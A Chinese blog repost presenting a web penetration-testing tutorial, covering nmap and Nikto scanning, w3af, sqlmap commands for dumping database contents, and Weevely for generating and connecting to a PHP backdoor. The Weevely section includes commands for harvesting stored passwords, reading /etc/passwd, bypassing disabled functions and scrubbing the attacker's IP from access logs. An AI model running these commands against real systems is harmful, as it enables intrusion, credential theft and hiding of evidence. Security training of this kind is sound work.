web渗透测试工具大全_web安全攻防渗透测试实战指南 pdf

web渗透测试工具大全_web安全攻防渗透测试实战指南 pdf一、渗透测试工具nmap,查看网站服务器开放的端口1、查看服务器上运行的服务$nmap-sVhack-test.com2、查看操作系统版本$nmap-Ohack-test.com二、使用Nikto来收集漏洞信息#官方网站:https://cirt.net/nikto2#wgethttps://cirt.net/nikto/nikto-2.1.5.

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

一、渗透测试工具nmap,查看网站服务器开放的端口

1、查看服务器上运行的服务
$ nmap -sV hack-test.com

2、查看操作系统版本
$ nmap -O hack-test.com

这里写图片描述

这里写图片描述

二、使用Nikto来收集漏洞信息

#官方网站:https://cirt.net/nikto2
#wget https://cirt.net/nikto/nikto-2.1.5.tar.gz (解压就可以用)

$ perl nikto.pl -h hack-test.com(ip或者域名)

这里写图片描述

三、用Backtrack 5 R1中的W3AF(Web应用扫描器或者叫做安全审计工具)

官方网站:http://sourceforge.net/projects/w3af/
建议下载window版本,linux需要安装python的好多依赖包,需要调试的比较多

#linux环境安装
$ git clone https://github.com/andresriancho/w3af.git
$ cd w3af/
$ ./w3af_console
$ /tmp/w3af_dependency_install.sh

这里写图片描述

后面我用的是windows版本测试的:
这里写图片描述

四、Sqlmap来检测url是否存在SQL注入

$ python sqlmap.py  –u url地址

#加入参数"-dbs"来尝试采集数据库名
$ python sqlmap.py  –u url地址 -dbs

#参数"-D 库名 --tables"来查看改数据库的所有表名
$ python sqlmap.py  –u url地址 -D 库名 --tables

#参数"-T 表名 --columns"来查看表中的字段
$ python sqlmap.py  –u url地址 -D 库名 -T 表名 --columns

#参数"-C 列名1,列名2 --dump"来查看值
$ ython sqlmap.py  –u url地址 -D 库名 -T 表名 -C 列名1,列名2 --dump

五、WebShell|网站后门检测工具

官网地址:http://www.webshell.pub/
#可以在线检测,也可以下载客户端
#我用客户端检测了下我们服务器的代码,蛮好用的

#在linux上运行命令
$ ./hm scan 网站根目录

六、Weevely(生成php后门工具)

下载地址: https://github.com/epinna/Weevely3
$ git clone https://github.com/epinna/weevely3.git
$ cd weevely3

#生成一个后门木马hello.php,密码为test
$ ./weevely.py generate test hello.php

这里写图片描述

#连接后门
$ ./weevely.py http://url地址/hello.php test

这里写图片描述

连接后操作命令
#查看系统信息
$ system.info

#获取数据库连接信息
$ grep . '^[^*/#]*passw?o?r?d?'    #使用grep命令查找其他用户存储在php脚本中的密码
$ grep . 'mysql_conn'              #连接数据库的语句
$ :sql_console -user 用户名 -passwd 密码 -host 数据库地址        #使用sql_console模块来连接数据库

#绕过策略读取/etc/passwd
$ :audit_etcpasswd

#日志清理
$ cd logs
$ :system_info -info client_ip   #使用system_info命令找到我们自己的ip
$ grep access.log ip地址          #截取日志中含有这个ip地址的信息
$ grep access.log -v ip地址 -output cleaned.log  #清掉日志中含有这个ip地址的信息
$  grep cleaned.log ip地址     #查看是否已经删除

#用cleaned.log来替换access.log
$ rm access.log
$ cp cleaned.log access.log
$ rm cleaned.log

#绕过系统禁用函数
$ :audit_disablefunctionbypass
$ ps -ef
$ quit

详情请参考:http://www.freebuf.com/sectool/39765.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/169924.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • icmp回复报文_ICMP报文和ping命令[通俗易懂]

    icmp回复报文_ICMP报文和ping命令[通俗易懂]一、ping的原理ping程序是用来探测主机到主机之间是否可通信,如果不能ping到某台主机,表明不能和这台主机建立连接。ping使用的是ICMP协议,它发送icmp回送请求消息给目的主机。ICMP协议规定:目的主机必须返回ICMP回送应答消息给源主机。如果源主机在一定时间内收到应答,则认为主机可达。二、Ping工作过程——假定主机A的IP地址是192.168.1.1,主机B的IP地址是192….

    2022年6月3日
    71
  • petalinux笔记[通俗易懂]

    petalinux笔记[通俗易懂]记录一下这两天用正点原子开发板学petalinux的过程,众所周知,ZYNQ可以跑逻辑的FPGA,也可以跑裸机的SDK代码,还能跑个linux系统。在SDK开发中,只是在塔好的FPGA上跑一些简单的c代码,还没有安装上一个系统。1.首先是petalinux2018.3版本的安装建议参考正点原子的安装方法,注意事项就是使用ubuntu16.04版本而不是ubuntu18。要么就用ubuntu16.04配上petalin2018.3版本,要么就是ubuntu18配上pet…

    2022年9月11日
    0
  • jsp中JDBC连接MySQL数据库[通俗易懂]

    jsp中JDBC连接MySQL数据库[通俗易懂]前言:在进行网页制作时,难免会有数据库的使用,今天来讲一下jsp中利用JDBC连接MySQL数据库:::文章目录:一.JDBC:二.连接数据库:1.需要的包:2.加载驱动:3.连接数据库:一.JDBC:JDBC:Java数据库连接(JavaDatabaseConnectivity,简称JDBC)是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口,提供了诸如查询和更新数据库中数据的方法。JDBC也是SunMicrosystems的商标。我们通常说的JDBC是面向关系型数据库的。(–

    2022年9月9日
    0
  • 卓越性能 の 军火库「建议收藏」

    卓越性能 の 军火库「建议收藏」在介绍性能优化的军火库之前,先来扯几句题外话。希望这些题外话,能打消你追求卓越性能的理想,来甘心当一枚圆滑的钉子。我是非常不推荐程序员,对公司的业务,进行性能优化的。说这话,纯粹是基于个人自身安全考虑。因为性能优化,在大多数公司,属于费力不讨好的工作项。追求极简的代码,性能卓越的代码,是有追求的程序员的目标。但随着经历了大大小小的公司,我发现很多优秀的程序员,在经受着这种追求的反嗜,以至于痛不欲生。下有下面几点原因,虽然我们知道它肯定是错的,但我们无能无力:公司按照完成的功能,对程序员…

    2022年9月30日
    0
  • Android集成lrzsz[通俗易懂]

    Android集成lrzsz[通俗易懂]为啥要移植lrzsz本文中的lrzsz代码点击此处获取Hikey开发板有两类USB口,两组USB-TypeA母口作为Host,可以接键盘、鼠标。另一组mini-USB母口,作为devices,可以接到电脑上调试。但目前这两种接口无法同时使用,即通过键盘鼠标操作时不能使用ADB。虽然可以通过minicom或者putty之类的工具连接串口查看LOG、执行命令。但Android系统中缺少通过串口传

    2022年6月23日
    43
  • mpeg4标准包含{xvid\divx,h264\avc}

    mpeg4标准包含{xvid\divx,h264\avc}“MPEG-4由一系列的子标准组成,被称为部……………………………第二部(ISO/IEC14496-2):视讯:定义了一个对各种视觉信息(包括视讯,静止纹理,计算机合成图形等等)的编解码器。对视讯部分来说,众多”Profiles”中很常用的一种是AdvancedSimpleProfile(ASP),例如XviD编码就属于MPEG-4

    2022年9月18日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号